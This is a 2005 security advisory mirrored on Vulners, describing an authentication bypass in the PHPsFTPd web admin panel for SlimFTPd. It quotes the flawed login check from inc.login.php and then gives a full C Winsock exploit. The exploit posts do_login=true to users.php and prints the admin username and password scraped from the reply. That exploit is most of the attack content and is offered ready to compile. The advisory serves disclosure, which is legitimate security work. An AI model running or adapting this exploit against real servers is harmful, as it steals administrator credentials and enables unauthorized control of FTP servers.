Vulners
Lucene search
phpsftpd.txt
🗓️ 14 Jul 2005 00:00:00Reported by Stefan LochbihlerType 
packetstorm🔗 packetstormsecurity.com👁 22 Views
`Author: Stefan Lochbihler
Date: 11. Juli 2005
Affected Software: PHPsFTPd
Software Version: 0.2 -> 0.4
Software URL: http://phpsftpd.sourceforge.net/
Attack: Admin password leak
about PHPsFTPd:
PHPsFTPd is a web based administration and configuration interface
for the SLimFTPd ftp serverIt can be used an any http server that
suports PHP and does not need a database or adittional php modules,
only SlimFTPD It allows the administrators of the ftp server to
configurate it from within this interface as opposed to its native
ascii conf.file It shows statistics about the users that accesed
the server , the files that were downloaded , server breakdowns etc
Hi there again
during a look at the code of the PHPsFTPd Project i find out that it
is possible to get the Admins Username & Password. This happens
when we send a specially crafted POST Request to the user.php script.
The reason of the leakness is at the inc.login.php script.
When you take a look at the code below you see that the code will exit
if there is no logged session or we dont try to logout.
But when we POST the do_login var with some stuff in it execution goes on.
snipped from inc.login.php
//login form
if (!isset($_SESSION['logged']) && !isset($_GET['do_logout']) &&
!isset($_POST['do_login'])) {
echo "<p> </p>
<form action='index.php' method='post'>
<img src=gfx/ico_notice.gif align=absmiddle> Please login with admin
pass<br>
<input class=td type='password' name='pass'>
<input class=button type='submit' name='login' value='Login'>
</form>
";
die;
}
exploit:
Print the admins username & password
// PHPsFTPd Admin Password Leak
// tested on a WinXP SP1 box
#include "stdafx.h"
#include "stdio.h"
#include "winsock2.h"
#pragma comment (lib,"ws2_32")
#define PORT 80
#define rootdir "/phpsftpd/"
typedef unsigned long ulong;
void usage(char *);
ulong checkhost(char *);
ulong checkhost(char *host)
{
struct hostent *hp;
ulong host_ip=0;
host_ip=inet_addr(host);
if(host_ip==INADDR_NONE){
hp=gethostbyname(host);
if(!hp){
printf("unable to resolv host...\n");
exit(1);
}
host_ip= *(ulong*)hp->h_addr;
}
return host_ip;
}
void usage (char *progn){
printf("Usage[%s]: www.targethost.com\n",progn);
exit(0);
}
int main(int argc, char* argv[])
{
WSADATA wsa;
SOCKET client;
WORD wsVersion;
char httpRequest[1024];
char recvBuffer[1024];
char *p;
struct sockaddr_in addr;
int err=0,recvSize=0;
printf("PHPsFTPd Exploit v0.1 (c) by Steve mailto:[email protected]\n");
if(argc<2)
usage(argv[0]);
wsVersion=MAKEWORD(2,0);
if(err=WSAStartup(wsVersion,&wsa)){
printf("Error: WSAStartup\n");
exit(0);
}
client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(client==INVALID_SOCKET){
printf("Error: Create Socket\n");
exit(0);
}
addr.sin_addr.s_addr = checkhost(argv[1]);
addr.sin_port = htons(PORT);
addr.sin_family = AF_INET;
memset(httpRequest,'\0',sizeof(httpRequest));
strncat(httpRequest,"POST ",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,rootdir,sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"users.php?action=edit&username=root
HTTP/1.1\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"User-Agent: PHPSFTPD ACCOUNT
MANAGER\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Host:
www.targethost.com\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Content-Type:
application/x-www-form-urlencoded\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Content-Length:
13\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"do_login=true\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
err=connect(client,(SOCKADDR*)&addr,sizeof(addr));
//Get Http Stuff
send(client,httpRequest,strlen(httpRequest),0);
recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
recvBuffer[recvSize]='\0';
//Get username & password
recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
recvBuffer[recvSize]='\0';
//shit when anyone use a 0x20 on his password
p=strstr(recvBuffer,"value=");
printf("Username:");
for(p=p+6;*p!=0x20;p++)
putc(*p,stdout);
p=strstr(p,"value=");
printf("\n");
printf("Password:");
for(p=p+6;*p!=0x20;p++)
putc(*p,stdout);
closesocket(client);
WSACleanup();
printf("\n");
return 0;
}
Vendor Status: The Vendor is informed !
Discovered (c) by Steve
--
Erstellt mit Operas revolutionärem E-Mail-Modul: http://www.opera.com/m2/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jul 2005 00:00Current
7.4High risk
Vulners AI Score7.4